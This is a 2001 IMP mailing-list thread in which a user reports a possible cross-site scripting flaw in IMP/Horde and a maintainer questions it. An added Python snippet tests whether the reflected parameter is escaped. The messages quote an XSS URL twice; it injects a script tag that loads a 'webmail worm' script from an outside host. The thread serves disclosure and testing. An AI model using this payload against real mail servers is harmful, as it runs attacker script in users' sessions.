[imp] Scripting vulnerability, worm propagation??

Neil Johnson njohnson10@yahoo.com
Wed, 6 Jun 2001 11:36:02 -0700 (PDT)



Maybe a key oversight on my part here..
My original message stated loosely that when I click the link in the email that the javascript is included/executed.  In reality, if I look at the email message I sent myself containing the link - the link is NOT clickable because IMP did not actually link the whole url (the whole url is in the message, but it is not in the link.. part of it is just text in the body of the message).  Is this the correct way for IMP to function therefore handling issues like the scripting vulnerabilities?  
What I should have said in the first message was that if I log into my Horde/Imp server and paste the whole URL http://your.hordeimpserver.com/horde/imp/mailbox.php3?mailbox=INBOX%22%3E%3Cscript%20language%3D%22Javascript%22%20src%3D%22http%3A//www.sidesport.com/webworm/webmailworm.js%22%3E%3C/script%3E%3C%22asd into my browser, the Javascript is executed and I get the IMP inbox in the current browser window by itself and I get a separate browser window with the sidesport test page that the Javascript caused to pop up.  If I look at the browser html source of the inbox page the Javascript is included.
With that cleared up, is this situation a problem or have I just wasted everyone's time and bandwidth with a non-problem?
humbly,
Neil Johnson
Chuck Hagenbuch <chuck@horde.org> wrote: Quoting Neil Johnson :

> I think IMP 2.2.5 and Horde 1.2.5 are vulnerable to similar scripting
> exploits. For more info go to
> http://www.sidesport.com/webworm/index.html (not my site). I have
> emailed an account on my Horde/Imp server the following link and the
> link (the sidesport sample which I modified to point to my Horde/Imp
> server) seems to include in the source/execute the javascript.
> http://your.hordeimpserver.com/horde/imp/mailbox.php3?mailbox=INBOX%22%3E%3Cscript%20language%3D%22Javascript%22%20src%3D%22http%3A//www.sidesport.com/webworm/webmailworm.js%22%3E%3C/script%3E%3C%22asd

Things look properly escaped to me. What evidence did you see of javascript 
being included/executed?

-chuck

--
Charles Hagenbuch, 
Black and white and grey, all the shades of truth.

-- 
IMP mailing list: http://horde.org/imp/
Frequently Asked Questions: http://horde.org/faq/
To unsubscribe, mail: imp-unsubscribe@lists.horde.org
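
Added example, not part of the original thread and not IMP's code: a check for whether a reflected mailbox parameter stays inside its attribute or breaks out into new markup, using the URL quoted in the message. The template and the names TEMPLATE, EXPECTED_TAGS, mailbox_param, render, TagCollector and inspect_fragment are assumptions made for illustration.

```python
from html import escape
from html.parser import HTMLParser
from urllib.parse import parse_qs, urlsplit

# URL quoted in the message above; the host is the poster's placeholder.
REPORTED_URL = (
    "http://your.hordeimpserver.com/horde/imp/mailbox.php3?mailbox=INBOX%22%3E"
    "%3Cscript%20language%3D%22Javascript%22%20src%3D%22http%3A//www.sidesport.com"
    "/webworm/webmailworm.js%22%3E%3C/script%3E%3C%22asd"
)

# Assumption: the mailbox name is echoed into a quoted attribute like this one.
# This template is hypothetical, not taken from IMP.
TEMPLATE = '<form><input type="hidden" name="mailbox" value="{}"></form>'
EXPECTED_TAGS = {"form", "input"}

def mailbox_param(url):
    """Return the percent-decoded mailbox parameter, as the server receives it."""
    return parse_qs(urlsplit(url).query)["mailbox"][0]

def render(value, escaped):
    """Build the page fragment, with or without output escaping."""
    return TEMPLATE.format(escape(value, quote=True) if escaped else value)

class TagCollector(HTMLParser):
    """Record start tags and the value a parser sees on <input>."""
    def __init__(self):
        super().__init__()
        self.tags, self.values = [], []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)
        if tag == "input":
            self.values.append(dict(attrs).get("value"))

def inspect_fragment(value, escaped):
    """Return (unexpected tags, input values) for the rendered fragment."""
    collector = TagCollector()
    collector.feed(render(value, escaped))
    collector.close()
    unexpected = [t for t in collector.tags if t not in EXPECTED_TAGS]
    return unexpected, collector.values

if __name__ == "__main__":
    value = mailbox_param(REPORTED_URL)
    print("unescaped:", inspect_fragment(value, escaped=False))
    print("escaped:  ", inspect_fragment(value, escaped=True))
```

Viewing the page source shows the same distinction: when the output is escaped, the parameter appears with &quot;, &lt; and &gt; inside the attribute value; when it is not, a literal script element follows the input tag.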


